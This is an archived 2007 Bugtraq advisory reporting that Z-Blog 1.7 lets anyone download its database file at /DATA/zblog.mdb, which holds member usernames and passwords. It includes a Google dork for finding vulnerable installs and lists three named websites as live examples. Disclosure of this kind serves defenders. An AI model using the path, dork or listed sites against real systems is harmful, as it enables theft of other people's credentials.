| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 1 Jun 2007 11:19:38 -0000
From: Raed@...Mail.Com
To: bugtraq@...urityfocus.com
Subject: Z-Blog 1.7 Authentication Bypass Database Download Vulnerability
* Author : Hasadya Raed
* Contact : RaeD@...Mail.Com ~>Israel Hacker
* Greetz : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script : Z-Blog 1.7
* Impact : Remote
* Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
* Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
--/ REPRODUCE \--
# Attackers Can Authentication Bypass In This Product By Add The Following Files:
('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
The Users Names And Passwords Inside
--/ Examples \--
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
Powered by blists - more mailing lists